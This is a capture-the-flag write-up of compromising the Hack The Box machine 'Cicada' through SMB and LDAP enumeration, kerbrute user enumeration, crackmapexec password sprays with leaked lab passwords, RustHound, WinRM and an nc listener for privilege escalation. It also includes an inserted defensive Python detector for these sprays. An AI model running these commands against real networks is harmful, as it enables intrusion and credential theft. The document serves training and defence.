
【Hack The Box】Cicada【WriteUp】

Posted at 2025-02-15

Introduction

This article is a write-up of my attempt at the Hack The Box (see the link below) machine "Cicada".
Note: as with my previous write-ups, this does not go into detail on how each tool is used.

※Please do not misuse any of this. Use these techniques only to contribute to society; anything else is against the law.

Initial enumeration

Port scan

┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.11.35 --top
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.35:53
Open 10.10.11.35:88
Open 10.10.11.35:139
Open 10.10.11.35:135
Open 10.10.11.35:389
Open 10.10.11.35:445
Open 10.10.11.35:464
Open 10.10.11.35:593
Open 10.10.11.35:636
Open 10.10.11.35:3268
Open 10.10.11.35:3269
Open 10.10.11.35:5985
Open 10.10.11.35:50997
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 07:29 EDT
Initiating Ping Scan at 07:29
Scanning 10.10.11.35 [4 ports]
Completed Ping Scan at 07:29, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:29
Completed Parallel DNS resolution of 1 host. at 07:29, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:29
Scanning 10.10.11.35 [13 ports]
Discovered open port 53/tcp on 10.10.11.35
Discovered open port 445/tcp on 10.10.11.35
Discovered open port 139/tcp on 10.10.11.35
Discovered open port 464/tcp on 10.10.11.35
Discovered open port 135/tcp on 10.10.11.35
Discovered open port 389/tcp on 10.10.11.35
Discovered open port 50997/tcp on 10.10.11.35
Discovered open port 3269/tcp on 10.10.11.35
Discovered open port 88/tcp on 10.10.11.35
Discovered open port 5985/tcp on 10.10.11.35
Discovered open port 593/tcp on 10.10.11.35
Discovered open port 636/tcp on 10.10.11.35
Discovered open port 3268/tcp on 10.10.11.35
Completed SYN Stealth Scan at 07:29, 0.42s elapsed (13 total ports)
Nmap scan report for 10.10.11.35
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-10-09 07:29:42 EDT for 1s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
50997/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
           Raw packets sent: 17 (724B) | Rcvd: 15 (660B)

Windows ports are open. There do not appear to be any HTTP services that would be used through a browser.

Domain information gathering

Run the LDAP script as well to quickly pick up information about the AD environment.

┌──(root㉿kali)-[~/work]
└─# nmap -p 389 -n -Pn --script ldap-rootdse 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 07:26 EDT
Nmap scan report for 10.10.11.35
Host is up (0.19s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=cicada,DC=htb
|       ldapServiceName: cicada.htb:cicada-dc$@CICADA.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cicada,DC=htb
|       serverName: CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=cicada,DC=htb
|       namingContexts: DC=cicada,DC=htb
|       namingContexts: CN=Configuration,DC=cicada,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=cicada,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=cicada,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=cicada,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 196755
|       dsServiceName: CN=NTDS Settings,CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
|       dnsHostName: CICADA-DC.cicada.htb
|       defaultNamingContext: DC=cicada,DC=htb
|       currentTime: 20241009182630.0Z
|_      configurationNamingContext: CN=Configuration,DC=cicada,DC=htb
Service Info: Host: CICADA-DC; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds

That gives us the domain information: cicada.htb. Register it in /etc/hosts as follows.

10.10.11.35    cicada.htb

Run enum4linux as well.

┌──(root㉿kali)-[~/work]
└─# enum4linux 10.10.11.35
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct  9 07:27:20 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.11.35
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.11.35 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.11.35 )================================

Looking up status of 10.10.11.35
No reply from 10.10.11.35

 ====================================( Session Check on 10.10.11.35 )====================================


[+] Server 10.10.11.35 allows sessions using username '', password ''


 =================================( Getting domain SID for 10.10.11.35 )=================================

Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.11.35 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.11.35 from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 ========================================( Users on 10.10.11.35 )========================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED


 ==================================( Share Enumeration on 10.10.11.35 )==================================

do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.35


 ============================( Password Policy Information for 10.10.11.35 )============================


[E] Unexpected error from polenum:



[+] Attaching to 10.10.11.35 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.11.35)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient



 =======================================( Groups on 10.10.11.35 )=======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ===================( Users on 10.10.11.35 via RID cycling (RIDS: 500-550,1000-1050) )===================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ================================( Getting printer info for 10.10.11.35 )================================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Wed Oct  9 07:28:15 2024

Nothing particularly useful here.

SMB enum

Let's dig into SMB.

┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.10.11.35

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DEV             Disk      
	HR              Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Since the shares are visible, there is probably some information in them, so let's enumerate.
First the DEV share.

┌──(root㉿kali)-[~]
└─# smbclient -N //10.10.11.35/DEV
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

No permissions there, it seems, so on to the HR share.

┌──(root㉿kali)-[~]
└─# smbclient -N //10.10.11.35/HR
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

		4168447 blocks of size 4096. 324720 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit

There was a "Notice from HR.txt", so let's check its contents.

┌──(root㉿kali)-[~/work]
└─# cat Notice\ from\ HR.txt                    

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

It looks like we will be using this password. So, let's enumerate users.
Before that, check whether anything is visible through an LDAP search.

LDAP enum

┌──(root㉿kali)-[~/work]
└─# ldapsearch -x -v -b "DC=cicada,DC=htb" -H "ldap://10.10.11.35" "(objectclass=*)"
ldap_initialize( ldap://10.10.11.35:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# extended LDIF
#
# LDAPv3
# base <DC=cicada,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

Nothing comes out of that either.

Initial access

User enumeration

Kerbrute

When enumerating users in an AD environment there are many things to take into account, such as naming conventions,
but for now I'll just brute-force it. The first tool that comes to mind is kerbrute.

┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/Names/names.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop

2024/10/09 07:32:38 >  Using KDC(s):
2024/10/09 07:32:38 >  	10.10.11.35:88

2024/10/09 07:35:59 >  Done! Tested 10177 usernames (0 valid) in 201.244 seconds

No users found with this list. On to the next one.

┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/Names/forenames-india-top1000.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop

2024/10/09 07:36:39 >  Using KDC(s):
2024/10/09 07:36:39 >  	10.10.11.35:88

2024/10/09 07:37:01 >  Done! Tested 1000 usernames (0 valid) in 21.743 seconds

None here either. Next.

┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/top-usernames-shortlist.txt      

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop

2024/10/09 07:38:03 >  Using KDC(s):
2024/10/09 07:38:03 >  	10.10.11.35:88

2024/10/09 07:38:04 >  [+] VALID USERNAME:	 administrator@cicada.htb
2024/10/09 07:38:04 >  [+] VALID USERNAME:	 guest@cicada.htb
2024/10/09 07:38:04 >  Done! Tested 17 usernames (2 valid) in 0.403 seconds

The default Guest user exists. If it is enabled, RID brute-forcing might work as-is.

RID Brute

0.png
Users found! I put them into a list, as below, to use for password spraying.

┌──(root㉿kali)-[~/work]
└─# cat users.txt                               
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Password spraying

Check whether authentication succeeds with the password from earlier.

┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

michael.wrightson went through! With this we might now be able to see the DEV share from earlier, so check the share permissions with crackmapexec.
1.png
Doesn't look like it is visible.
So, let's run RustHound with these credentials.

Lateral movement

Bloodhound

Bloodhound-Python would also work, but this time I'll use RustHound.

┌──(root㉿kali)-[/opt/RustHound]
└─# ./rusthound_musl -d cicada.htb -i 10.10.11.35 -u michael.wrightson@cicada.htb -p 'Cicada$M6Corpb*@Lp#nZp!8' -z --adcs
---------------------------------------------------
Initializing RustHound at 07:46:42 on 10/09/24
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2024-10-09T11:46:42Z INFO  rusthound] Verbosity level: Info
[2024-10-09T11:46:42Z INFO  rusthound::ldap] Connected to CICADA.HTB Active Directory!
[2024-10-09T11:46:42Z INFO  rusthound::ldap] Starting data collection...
[2024-10-09T11:46:44Z INFO  rusthound::ldap] All data collected for NamingContext DC=cicada,DC=htb
[2024-10-09T11:46:44Z INFO  rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=cicada,DC=htb
[2024-10-09T11:46:44Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2024-10-09T11:46:44Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2024-10-09T11:46:44Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2024-10-09T11:46:44Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2024-10-09T11:46:44Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2024-10-09T11:46:44Z INFO  rusthound::modules] Starting checker for ADCS values...
[2024-10-09T11:46:44Z INFO  rusthound::modules] Checking for ADCS values finished!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 9 users parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 62 groups parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 1 computers parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 2 ous parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 1 domains parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 3 gpos parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 21 containers parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 0 cas parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] 33 templates parsed!
[2024-10-09T11:46:44Z INFO  rusthound::json::maker] .//20241009074644_cicada-htb_rusthound.zip created!

RustHound Enumeration Completed at 07:46:44 on 10/09/24! Happy Graphing!

Start BloodHound with the following commands.

┌──(root㉿kali)-[~/work]
└─# neo4j console

# in a separate terminal
┌──(root㉿kali)-[~/work]
└─# bloodhound

Feed it the ZIP file created by RustHound and dig through the information.
To start, enter the following query, which lists user descriptions, into the "Raw Query" box at the bottom of the BloodHound window.

MATCH (u:User) WHERE u.description IS NOT NULL RETURN u

2.png
krbtgt and administrator are built-in accounts whose descriptions are set by default, so I don't pay much attention to those, but something is written for david.orelious.
Could this be a password?

Password spraying

Let's verify the password found above.

┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' -d cicada.htb --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\michael.wrightson:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE

Authentication succeeded! We now have credentials for another user.
Check whether the DEV share is visible.
3.png
Oh, it looks visible.
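As an added example (not part of the original post, and not from any tool used in it), the following Python shows the defender's side of the two bursts above: the kerbrute user enumeration and the two crackmapexec password sprays. It assumes Security events 4768 (result 0x6 for an unknown principal), 4625 (status 0xC000006A for a wrong password) and 4624 on success, represented as constructed tuples; the 10.10.14.x client addresses are made up.

```python
"""Defender-side view of the kerbrute user enumeration and crackmapexec sprays.

Added example for this write-up, not from the original post or any tool in it.
A kerbrute probe is one AS-REQ, logged on the DC as 4768 with result 0x6 for an
unknown principal; a spray attempt is one logon, logged as 4625 with status
0xC000006A (wrong password) or 4624 on success. All events below are constructed
sample data, as are the 10.10.14.x client addresses.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # sliding window applied per source address
MIN_ACCOUNTS = 4               # distinct accounts before a source is flagged

# Constructed events: (timestamp, event id, client address, account, status)
SAMPLE_EVENTS = [
    # kerbrute-style probing: wordlist names that do not exist in the domain
    ("2024-10-09T07:38:03", 4768, "10.10.14.5", "admin", "0x6"),
    ("2024-10-09T07:38:03", 4768, "10.10.14.5", "test", "0x6"),
    ("2024-10-09T07:38:03", 4768, "10.10.14.5", "user", "0x6"),
    ("2024-10-09T07:38:04", 4768, "10.10.14.5", "oracle", "0x6"),
    # one default password sprayed over the user list: four misses, one hit
    ("2024-10-09T07:41:10", 4625, "10.10.14.5", "john.smoulder", "0xC000006A"),
    ("2024-10-09T07:41:10", 4625, "10.10.14.5", "sarah.dantelia", "0xC000006A"),
    ("2024-10-09T07:41:11", 4624, "10.10.14.5", "michael.wrightson", "0x0"),
    ("2024-10-09T07:41:11", 4625, "10.10.14.5", "david.orelious", "0xC000006A"),
    ("2024-10-09T07:41:11", 4625, "10.10.14.5", "emily.oscars", "0xC000006A"),
    # benign noise: one user mistyping their own password twice from elsewhere
    ("2024-10-09T07:41:30", 4625, "10.10.14.9", "emily.oscars", "0xC000006A"),
    ("2024-10-09T07:41:45", 4625, "10.10.14.9", "emily.oscars", "0xC000006A"),
]


def classify(event_id, status):
    """Map one event to 'unknown_user', 'bad_password', 'success' or None."""
    status = status.lower()
    if event_id == 4768 and status == "0x6":
        return "unknown_user"   # KDC_ERR_C_PRINCIPAL_UNKNOWN
    if event_id == 4625 and status == "0xc000006a":
        return "bad_password"   # STATUS_WRONG_PASSWORD
    if event_id == 4624:
        return "success"
    return None                 # other events are not used by this detector


def detect(events, window=WINDOW, min_accounts=MIN_ACCOUNTS):
    """One alert per (source, type) with >= min_accounts distinct failing accounts in window."""
    by_src = defaultdict(list)
    for ts, event_id, src, account, status in events:
        kind = classify(event_id, status)
        if kind is not None:
            by_src[src].append((datetime.fromisoformat(ts), kind, account))
    alerts = []
    for src, records in by_src.items():
        records.sort(key=lambda r: r[0])
        for kind, label in (("unknown_user", "username enumeration"),
                            ("bad_password", "password spray")):
            fails = [r for r in records if r[1] == kind]
            lo = 0
            for hi in range(len(fails)):
                while fails[hi][0] - fails[lo][0] > window:
                    lo += 1   # slide the window start forward
                accounts = {a for _, _, a in fails[lo:hi + 1]}
                if len(accounts) < min_accounts:
                    continue
                start, end = fails[lo][0], fails[hi][0]
                hits = []     # successes from the same source inside the burst
                if kind == "bad_password":
                    hits = sorted({a for t, k, a in records
                                   if k == "success" and start <= t <= end})
                alerts.append({"source": src, "type": label,
                               "accounts": len(accounts), "compromised": hits})
                break         # one alert per source and type is enough
    return alerts
```

The spray alert carries the account that logged on during the burst (michael.wrightson in the sample), which is the account to reset first; the second host, failing repeatedly on a single account, is not flagged.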

smbclient

Let's get into DEV, then.

┌──(root㉿kali)-[~/work]
└─# smbclient //10.10.11.35/DEV -U david.orelious --password='aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

		4168447 blocks of size 4096. 332897 blocks available
smb: \> prompt off
smb: \> mget Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

There is a script, so let's check its contents.
4.png
These look like credentials for emily.oscars, so let's check them. Having moved laterally this far, I figured WinRM access would work, so I'll check that way.
5.png
Looks promising.
6.png
Yes. We have a shell! User flag obtained!

Privilege escalation

whoami /priv

First, check this.

*Evil-WinRM* PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users> 

Looks like administrator can be obtained right away. I abused SeBackupPrivilege in Blackfield (see below), so this time I'll abuse SeRestorePrivilege.

SeRestorePrivilege

I use the exploit binary below.

After compiling it, transfer it over. I also send nc.exe; on Kali, nc.exe ships by default under a path like /usr/share/windows-binaries (I think), so I use that one.
7.png
Then set up the following listener.

┌──(root㉿kali)-[~/work]
└─# nc -lnvp 4444

Let's escalate!
8.png
9.png
Got elevated privileges. That gives us the root flag.

Summary

image.png
With that, privilege escalation succeeded and we obtained Administrator rights.
It was a bit of a long road to the user flag, but I think this box is good practice for compromising an AD environment.
There are no real rabbit holes, so I recommend it for AD beginners.

I hope this once again helps my fellow security engineers.
